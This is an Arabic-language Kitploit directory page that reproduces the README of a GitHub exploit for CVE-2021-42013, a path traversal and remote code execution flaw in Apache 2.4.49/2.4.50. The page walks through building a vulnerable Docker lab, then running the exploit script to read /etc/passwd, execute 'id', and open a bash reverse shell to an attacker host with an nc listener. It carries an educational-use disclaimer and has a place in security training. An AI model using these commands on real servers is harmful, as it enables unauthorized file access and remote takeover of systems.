Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-42013 — استغلال لـ Apache 2.4.49/2.4.50 لاجتياز المسار و RCE (CVE-2021-42013). يتضمن إعداد Docker وسكربت لاختبار اجتياز المسار وتنفيذ الأوامر والحصول على قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/asepsaepdin/cve-2021-42013
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليمأداة الوصول عن بعدمختبرات وتدريب عملي
GitHubasepsaepdin/cve-2021-42013

CVE-2021-42013

استغلال لـ Apache 2.4.49/2.4.50 لاجتياز المسار و RCE (CVE-2021-42013). يتضمن إعداد Docker وسكربت لاختبار اجتياز المسار وتنفيذ الأوامر والحصول على قشرة عكسية.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-42013 - اجتياز المسار وتنفيذ الأوامر عن بُعد (RCE) في Apache 2.4.50


⚠️ لأغراض البحث التعليمي والأمني المصرح به فقط

مؤلفو الاستغلال الأصليون

امتنان كبير لمؤلف الـ PoC الأصلي Walnut Security Services Pvt. Ltd

الوصف

يمكن للمهاجم استخدام هجوم اجتياز المسار لربط عناوين URL بملفات خارج الدلائل التي تم تكوينها بواسطة توجيهات مشابهة لـ Alias. إذا كانت الملفات خارج هذه الدلائل غير محمية بالتكوين الافتراضي المعتاد "require all denied"، فقد تنجح هذه الطلبات. إذا تم أيضًا تفعيل نصوص CGI لهذه المسارات المستعارة، فقد يسمح ذلك بتنفيذ الأوامر عن بُعد. تؤثر هذه المشكلة فقط على Apache 2.4.49 وApache 2.4.50 وليس الإصدارات الأقدم.


خطوات الدليل

  1. أولاً، قم باستنساخ المستودع

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2021-42013.git
    
  • انتقل إلى الدليل

    root@kitploit:~
    cd CVE-2021-42013
    
  • قم ببناء الحاوية الضعيفة

    root@kitploit:~
    docker build -t CVE-2021-42013 .
    
  • قم بتشغيل حاوية مؤقتة

    root@kitploit:~
    docker run --rm -it --name CVE-2021-42013 CVE-2021-42013
    
  • تحقق من عنوان IP للحاوية

    root@kitploit:~
    docker inspect CVE-2021-42013 | grep "IPAddress"
    
  • امنح صلاحية التنفيذ للبرنامج النصي

    root@kitploit:~
    chmod +x cve-2021-42013.sh
    
  • لاختبار وتأكيد اجتياز المسار، يجب اكتشاف دليل صالح، وهو في هذه الحالة تم تكوينه كـ /icons. لذلك، سيؤدي تنفيذ الأمر التالي إلى تفعيل ثغرة اجتياز المسار وطباعة محتويات ملف /etc/passwd:

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3/icons /etc/passwd
    
  • لاختبار وتأكيد تنفيذ الأوامر عن بُعد، يجب تكوين وتفعيل CGI، وهو صحيح في هذه الحالة. لذلك، سيؤدي تنفيذ الأمر التالي إلى تفعيل تنفيذ الأوامر عن بُعد وطباعة مخرجات أمر id:

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.3 /bin/bash id
    
  • من منظور المهاجم، يعد تنفيذ الأوامر عن بُعد أمرًا بالغ الأهمية للحصول على وصول إلى شل تفاعلية. لذلك، سيؤدي تنفيذ الأمر التالي إلى تفعيل شل عكسية تقليدية عبر TCP بناءً على bash إلى نظام المهاجم على المنفذ 4444/tcp:

    root@kitploit:~
    ./cve-2021-42013.sh 172.17.0.4 /bin/bash 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'
    
    root@kitploit:~
    nc -nlvp 4444
    

  • الإسناد

    • https://github.com/walnutsecurity/cve-2021-42013
    • https://nvd.nist.gov/vuln/detail/CVE-2021-42013
    • https://www.exploit-db.com/docs/50552
    • https://www.exploit-db.com/exploits/50406
    تنزيل الأداة